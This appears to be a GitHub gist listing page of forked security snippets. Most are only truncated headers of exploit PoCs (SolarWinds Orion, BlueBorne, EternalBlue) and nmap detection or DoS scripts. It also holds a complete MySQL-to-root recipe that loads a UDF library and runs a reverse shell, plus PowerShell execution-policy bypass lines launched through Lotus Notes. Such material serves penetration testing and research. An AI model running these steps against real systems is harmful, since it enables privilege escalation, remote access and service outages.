I hereby claim:
- I am shaheemirza on github.
- I am shaheemirza (https://keybase.io/shaheemirza) on keybase.
- I have a public key ASBTxO-YmsRzRF9C1e7DfUKX7EMIPJui-OwN0ml7-w7DXgo
To claim this, I am signing this object:
Shahee Mirza shaheemirza
shaheemirza
/ CVE-2020-10148.py
Created
December 28, 2020 23:51
— forked from 0xsha/Solarwinds_Orion_LFD.py
CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? ) | |
| # @0xSha | |
| # (C) 2020 0xSha.io | |
| # Advisory : https://www.solarwinds.com/securityadvisory | |
| # Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip | |
| # Details : https://kb.cert.org/vuls/id/843464 | |
| # C:\inetpub\SolarWinds\bin\OrionWeb.DLL | |
| # According to SolarWinds.Orion.Web.HttpModules |
shaheemirza
/ blueborne-nexus5.py
Created
November 23, 2017 09:42
— forked from jesux/blueborne-nexus5.py
Blueborne RCE PoC - Nexus5 6.0.1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import sys | |
| import time | |
| import struct | |
| import select | |
| import binascii | |
| import bluetooth | |
| from bluetooth import _bluetooth as bt |
shaheemirza
/ LotusNotes Running PowerShell Code
Created
August 26, 2017 12:18
— forked from danielbohannon/LotusNotes Running PowerShell Code
LotusNotes Running PowerShell Code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | |
| NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | |
| Hashes of each binary (prepare for onslaught of md5 naysayers): | |
| Notes.exe — 8f633ef1e1147637c25dd917909cd361 | |
| NLNOTES.EXE — 3586b9069a1d4e1c63d9c9cf95cf4126 |
shaheemirza
/ eternalblue8_exploit.py
Created
May 18, 2017 08:36
— forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
shaheemirza
/ smb-vuln-ms17-010.nse
Created
May 18, 2017 05:58
[Nmap] Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| local smb = require "smb" | |
| local vulns = require "vulns" | |
| local stdnse = require "stdnse" | |
| local string = require "string" | |
| description = [[ | |
| Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code | |
| execution vulnerability (ms17-010). | |
| The script connects to the $IPC tree, executes a transaction on FID 0 and |
shaheemirza
/ mysql-vuln-cve2017-3599.nse
Created
May 18, 2017 05:54
[nmap] CVE-2017-3599 - remote unauthenticated Denial of Service against Oracle MySQL.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| description=[[ | |
| CVE-2017-3599 - remote unauthenticated Denial of Service against Oracle MySQL. | |
| Warning: This WILL cause DoS on vulnerable mysql machines. | |
| Thanks: SECWORKS, hackers.mu team. | |
| ]] | |
| --- | |
| --@usage nmap -sU -p <portnum> --script mysql-vuln-cve2017-3599 --script-args mysql-vuln-cve2017-3599.ports=<ports> <target> | |
| --@output | |
| --PORT STATE SERVICE |
shaheemirza
/ sign.sh
Created
April 6, 2017 12:18
— forked from ezimuel/sign.sh
Sign and verify a file using OpenSSL command line tool. It exports the digital signature in Base64 format.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Sign a file with a private key using OpenSSL | |
| # Encode the signature in Base64 format | |
| # | |
| # Usage: sign <file> <private_key> | |
| # | |
| # NOTE: to generate a public/private key use the following commands: | |
| # | |
| # openssl genrsa -aes128 -passout pass:<passphrase> -out private.pem 2048 | |
| # openssl rsa -in private.pem -passin pass:<passphrase> -pubout -out public.pem |
shaheemirza
/ mysql_root_to_system_root
Created
March 1, 2017 19:42
— forked from p0c/mysql_root_to_system_root
#pentest #recipe: mysql root -> system root (linux)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql | |
| # (currently not present in kali's sqlmap, only the windows one, the same for metasploit...) | |
| mysql> use mysql; | |
| mysql> create table test(line blob); | |
| mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so')); | |
| mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so'; | |
| mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; | |
| mysql> select sys_exec('./reverse_shell &'); |
shaheemirza
/ convert id_rsa to pem
Created
January 22, 2017 06:01
— forked from mingfang/convert id_rsa to pem
Convert id_rsa to pem file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| openssl rsa -in ~/.ssh/id_rsa -outform pem > id_rsa.pem | |
| chmod 700 id_rsa.pem |
NewerOlder